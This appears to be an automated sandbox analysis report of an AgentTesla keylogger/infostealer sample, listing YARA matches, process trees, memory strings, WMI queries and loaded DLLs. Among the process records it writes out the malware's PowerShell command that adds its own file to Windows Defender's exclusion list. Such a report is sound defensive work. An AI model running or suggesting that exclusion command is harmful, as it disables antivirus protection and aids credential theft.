                      Source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_00C70F180_2_00C70F18
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_00C72C500_2_00C72C50
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_00C72C600_2_00C72C60
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_00C70E850_2_00C70E85
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_00C737D00_2_00C737D0
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_00C737E00_2_00C737E0
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_08EE1E780_2_08EE1E78
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_08EEF1380_2_08EEF138
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_08EED3E00_2_08EED3E0
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_08EEAA780_2_08EEAA78
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_08EE8B600_2_08EE8B60
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_08EE8F980_2_08EE8F98
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_08EEA6400_2_08EEA640
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_08EE87280_2_08EE8728
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_0196EB205_2_0196EB20
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_01964A685_2_01964A68
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_01963E505_2_01963E50
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_019641985_2_01964198
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_0196ADB05_2_0196ADB0
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EA697C5_2_06EA697C
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EA6E105_2_06EA6E10
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EA1F315_2_06EA1F31
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EA5D485_2_06EA5D48
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EB66D85_2_06EB66D8
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EB56A85_2_06EB56A8
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EB35685_2_06EB3568
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EBB2FF5_2_06EBB2FF
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EBC2605_2_06EBC260
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EB7E605_2_06EB7E60
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EB77805_2_06EB7780
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EB27285_2_06EB2728
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EBE4905_2_06EBE490
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EB00405_2_06EB0040
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EB5DCF5_2_06EB5DCF
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_06EB00215_2_06EB0021
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_016423087_2_01642308
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_01640F187_2_01640F18
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_016422317_2_01642231
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_01642C607_2_01642C60
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_01642C507_2_01642C50
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_01640E857_2_01640E85
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_016432417_2_01643241
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_016437D07_2_016437D0
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_016436A87_2_016436A8
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_016436B87_2_016436B8
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_028CE02010_2_028CE020
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_028CEA0010_2_028CEA00
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_028C4A6810_2_028C4A68
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_028CA82810_2_028CA828
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_028C3E5010_2_028C3E50
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_028C419810_2_028C4198
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_028CAC9010_2_028CAC90
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0666415C10_2_0666415C
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06666A5010_2_06666A50
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06661F5810_2_06661F58
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06665D6810_2_06665D68
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06665D5B10_2_06665D5B
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06677E6810_2_06677E68
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_066766E010_2_066766E0
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_066756B010_2_066756B0
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0667357010_2_06673570
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0667C26810_2_0667C268
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0667B30710_2_0667B307
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0667778810_2_06677788
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0667E49810_2_0667E498
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06675DD710_2_06675DD7
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0667004010_2_06670040
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0667003E10_2_0667003E
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB0F1812_2_00CB0F18
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB22F112_2_00CB22F1
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB2C5012_2_00CB2C50
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB2C6012_2_00CB2C60
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB0F0712_2_00CB0F07
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB36A812_2_00CB36A8
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB37D012_2_00CB37D0
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB37E012_2_00CB37E0
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_0292EA0014_2_0292EA00
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_02924A6814_2_02924A68
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_02923E5014_2_02923E50
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_0292419814_2_02924198
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_0292AC9014_2_0292AC90
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067E415C14_2_067E415C
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067E537014_2_067E5370
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067E6A5014_2_067E6A50
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067E5D6814_2_067E5D68
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067E5D5814_2_067E5D58
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067F7E6814_2_067F7E68
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067F66E014_2_067F66E0
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067F56B014_2_067F56B0
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067F357014_2_067F3570
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067FC26814_2_067FC268
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067FB30714_2_067FB307
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067F778814_2_067F7788
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067FE49814_2_067FE498
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067F5DD714_2_067F5DD7
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067F004014_2_067F0040
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067F003E14_2_067F003E
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000003EA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1724879627.0000000002669000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000003E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1721569298.00000000009CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename4050351b-3b81-4030-83d1-4403e211abfe.exe4 vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1729508897.00000000074A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1724879627.0000000002A05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename4050351b-3b81-4030-83d1-4403e211abfe.exe4 vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exe, 00000000.00000000.1671736981.00000000002DD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecIfx.exe0 vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1731244450.0000000009710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2918914362.0000000000440000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename4050351b-3b81-4030-83d1-4403e211abfe.exe4 vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2920013150.0000000001198000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exeBinary or memory string: OriginalFilenamecIfx.exe0 vs iNFGd6bDZX.exe
                      Source: iNFGd6bDZX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 12.2.newapp.exe.427fd00.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.newapp.exe.4eefd48.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: iNFGd6bDZX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: newapp.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/9@2/2
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iNFGd6bDZX.exe.logJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMutant created: \Sessions\1\BaseNamedObjects\slbTasgBkGoOKE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mv4gxzg.rzl.ps1Jump to behavior
                      Source: iNFGd6bDZX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: iNFGd6bDZX.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: iNFGd6bDZX.exeVirustotal: Detection: 72%
                      Source: iNFGd6bDZX.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeFile read: C:\Users\user\Desktop\iNFGd6bDZX.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
